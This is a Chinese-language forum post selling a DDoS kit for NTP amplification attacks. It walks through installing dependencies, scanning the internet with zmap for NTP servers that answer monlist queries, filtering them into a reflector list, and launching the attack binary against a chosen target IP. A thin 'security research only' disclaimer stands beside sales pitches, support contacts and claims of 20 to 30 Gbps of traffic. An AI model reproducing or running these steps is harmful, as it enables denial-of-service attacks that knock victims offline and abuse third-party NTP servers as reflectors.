上图是普通机器测的 本文实测 能有二三十G

乌克兰G口抗投诉服务器测试


NTP放大攻击不需要抓鸡也不需要种马。只需要一台可以发包和扫描的服务器即可
可以放大40-80倍的效果。
根据服务器而定,服务器越好量就打的越大。自己侧墙。。
购买后如有任何不懂的,请回帖,我会一一进行回答。
买了后玩不来的。下面可以下载教程。。


声明:文章中介绍的工具、技术带有一定的攻击性,仅供安全研究,请合理合法使用。!
关于有些服务器不能发起攻击的问题 请自己检查系统 实测脚本没有问题!
注意本文使用的是独立服务器 不是vps 云主机什么的!


本文使用的服务器系统
centos 6.6 64位 
内核
2.6.32-504.el6.x86_64

先更新系统
yum -y update

[color=rgb(51, 102, 153) !important]复制代码

区分centos6 centos7 执行不同的命令!
Centos 6
wget http://dl.fedoraproject.org/pub/ ... ease-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm

[color=rgb(51, 102, 153) !important]复制代码
centos 7 
wget http://dl.fedoraproject.org/pub/ ... ease-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm

[color=rgb(51, 102, 153) !important]复制代码

安装必要的依赖环境!
yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap

[color=rgb(51, 102, 153) !important]复制代码

上传这里的文件到你的机器!

开始扫描ntp放大列表
zmap -p 123 -M udp --probe-args=file:ntp_123_monlist.pkt -o monlist_fingerprint.txt

[color=rgb(51, 102, 153) !important]复制代码
扫描时间比较长 
扫描完成后

运行 ntp、ntpchecker
首先给它的权限:
chmod 777 ntp
chmod 777 ntpchecker

[color=rgb(51, 102, 153) !important]复制代码

运行ntpchecker
./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1

[color=rgb(51, 102, 153) !important]复制代码

开始执行过滤!
awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt

[color=rgb(51, 102, 153) !important]复制代码

过滤完成后就可以攻击了
./ntp <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>

[color=rgb(51, 102, 153) !important]复制代码

[email protected],我每天都在线,会第一时间修复。。。
不用担心买了链接失效的问题。。。。

再次提醒。如果楼下有人发下载包的价格低的。请不要下载。下载了你就可能中上套了,成了别人的肉鸡。
支持原创,售后我们一直都在做。。。。
本NTP放大工具没有任何软件,全部是文本和攻击扫描过滤列表。所以不存在有毒和后门的情况。。。


请加群 477962076